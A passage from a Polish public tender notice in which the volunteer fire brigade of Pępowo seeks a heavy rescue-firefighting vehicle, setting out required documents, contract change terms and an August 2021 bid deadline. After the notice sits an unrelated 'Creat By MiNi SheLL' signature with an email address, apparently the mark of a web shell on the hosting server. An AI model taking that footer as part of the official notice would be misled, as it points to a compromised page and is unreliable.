likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury – wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>	<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 6.4.1., zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy z odpowiednim zastosowaniem terminów, o których mowa w pkt 6.4.1.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) w celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego posiadania zdolności technicznej lub zawodowej należy przedłożyć:<br/><br/>- wykaz wykonanych dostaw, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych dostaw, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę jednego ciężkiego samochodu ratowniczo – gaśniczego, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane - według wzoru stanowiącego załącznik Nr 4 do niniejszej SWZ.<br/><br/>W w/w wykazie Zamawiający wymaga wskazania dostawy, której wykonanie potwierdza spełnianie przez wykonawcę określonego w pkt 5.1. ppkt. d warunku posiadania zdolności technicznej lub zawodowej oraz załączenia referencji bądź innych dokumentów wystawionych przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać ww. dokumentów – oświadczenie wykonawcy. UWAGI! <br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/><br/>Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia przewidziane względem wykonawcy.<br/><br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 6.1.1. niniejszej SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne dokumenty składane wraz z ofertą:<br/><br/>	6.2.1. Formularz ofertowy<br/>6.2.2. Pełnomocnictwo - w przypadku Wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia lub działania w imieniu wykonawcy osoby, której umocowanie nie wynika z dokumentów rejestrowych.<br/>6.2.3. Opis techniczny oferowanego pojazdu zgodnie z wzorem załącznika nr 1 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany lub uzupełnienia umowy wymagają akceptacji obu Stron i formy pisemnego aneksu, pod rygorem nieważności.<br/>2.	Zamawiający dopuszcza zmianę umowy w przypadkach określonych w art. 455 ust. 2 ustawy Prawo zamówień publicznych oraz przewiduje możliwość dokonania w umowie następujących zmian:<br/>1)	wynagrodzenia – w przypadku ustawowej zmiany wysokości stawki podatku VAT, oraz podatku akcyzowego, z tym zastrzeżeniem, że wartość netto wynagrodzenia wykonawcy nie zmieni się, a wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów; <br/>2)	terminu realizacji przedmiotu zamówienia – w przypadku wystąpienia poniższych okoliczności:<br/>a)	zaistnienia działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, buntów, niepokoje, strajków (z wyłączeniem wewnętrznych strajków u Wykonawcy),<br/>b)	zaistnienia klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bądź niekorzystnych warunków pogodowych;<br/>c)	sytuacja ekonomiczna, wydłużenie terminów uzyskania niezbędnych uzgodnień, opinii, pozwoleń, decyzji na potrzeby przedmiotu umowy;<br/>3)	zmian wynikających z nowelizacji przepisów prawa, które weszły w życie po zawarciu umowy i które wymagają modyfikacji umowy.<br/>4)	Wcześniejsza dostawa – skrócenie terminu – nie wymaga aneksu do Umowy.<br/>3. Warunki dokonania zmian:<br/>1) Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, na które powołuje się, jako podstawę zmiany umowy,<br/>2) wniosek o zmianę postanowień umowy musi być sporządzony na piśmie,<br/>3) wniosek, musi zawierać:<br/>- opis propozycji zmiany,<br/>- uzasadnienie zmiany,<br/>- opis wpływu zmiany na warunki realizacji umowy. <br/>4. Zmiana umowy może nastąpić również w przypadkach, o których mowa w art. 455 ust. 1 <br/>i ust. 2 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-24 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/pepowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-24 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiającym jest: Ochotnicza Straż Pożarna w Pępowie, ul. St. Nadstawek 1 C, <br/>63-830 Pępowo, NIP 696 170 25 16, REGON 411427275, która w niniejszym postępowaniu, zgodnie z zapisami art. 37 ust. 2 ustawy Pzp – w zakresie niezbędnym do przeprowadzania niniejszego postępowania, powierzyła pomocnicze działania zakupowe osobie trzeciej – Gminie Pępowo. W związku z powyższym Gmina Pępowo udostępnia OSP Pępowo <br/>a)	podmiotową stronę internetową Gminy Pępowo: www.pepowo.pl oraz platformę https://platformazakupowa.pl/pn/pepowo celem udostępnienia dokumentacji przetargowej postępowania, <br/>b)	konto Gminy Pępowo w Biuletynie Zamówień Publicznych celem przygotowania i zamieszczenia ogłoszenia o zamówieniu, ogłoszenia o wynikach postępowania, ogłoszenia o wykonaniu umowy itp. <br/>c) adres pocztowy oraz adres e-mailowy celem wskazania w dokumentacji przetargowej zamówienia tychże, jako adresów właściwych do komunikacji z Zamawiającym w przedmiotowym postępowaniu: e-mail: ug@pepowo.pl.

Creat By MiNi SheLL
Email: jattceo@gmail.com